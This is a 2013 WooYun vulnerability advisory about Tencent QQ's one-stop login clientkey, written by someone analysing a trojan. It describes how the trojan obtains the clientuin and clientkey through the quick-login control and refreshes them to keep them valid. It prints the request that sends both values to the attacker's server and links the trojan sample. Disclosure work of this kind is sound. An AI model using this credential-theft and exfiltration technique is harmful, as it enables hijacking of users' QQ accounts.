当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042676

漏洞标题:QQ帐号一站式Key的安全漏洞(附利用实例样本)

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2013-11-12 16:47

修复时间:2013-11-13 14:51

公开时间:2013-11-13 14:51

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-12: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

QQ帐号一站式Key没有使用安全协议,导致在页面间传递泄露,可以利用这个key操作QQ空间、腾讯微博等,为一种新型QQ盗号思路,目前已经出现利用工具

详细说明:

本漏洞是本人在做木马分析时候发现,具体流程如下
1)木马利用QQ的快捷登录控件,请求http://xui.ptlogin2.qq.com/cgi-bin/qlogin
然后点击页面上的登录,腾讯服务器会返回一个clientkey和当前登录的qq号并且跳转到www.qq.com

http://ptlogin2.qq.com/undefined?clientuin=54160134x&clientkey=00015281B6FE00686FAF6D75E76ECC7D6DB2C1BB1CA3D14091C87E306776F04DDE11D6F90600AF9C84AC930D98CB9C86148525D2EA1376442C0B6D43C51BEC5BFBA9685E37D9BD9A192FCF8B70E3498C86314DF5E7D06512E347516BEEFF72A0CB07087F461A701B70FCB567C3E5xxx


clientuin是当前登录QQ,而这个clientkey有什么用呢?攻击者可以利用qq对应的clientkey登录到腾讯旗下任意网站(QQ空间、微博等)


2)木马将获取到clientkey把获取到的clientuin及clientkey发送到远程服务器,不断刷新这个clientkey,使其有效,那么就可以利用有效的clientkey操作这个qq号的说说、日志、签名、分享、群成员
这个漏洞目前已经出现利用实例:http://www.mileyx.com
木马样本:http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/11/t.rar

漏洞证明:

上述流程你可以自己亲手试下
木马窃取clientuin及clientkey流程截图:

1.jpg


如图:木马利用QQ的快捷登录获取clientuin及clientkey。

2.jpg


可以从上图中看出qq及clientkey最后会通过如下请求发送到木马所有者的服务器上

http://www.mileyx.com/info/daicheng/get.asp?qq=【clientuin】&key=【clientkey】

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-11-13 14:51

厂商回复:

非常感谢您的报告。这个问题我们经过评估,暂未发现可以对用户或者业务产生影响,故不作处理。如果您对于该结论有任何的疑问,欢迎反馈指正,我们会有专人跟进处理。

最新状态:

暂无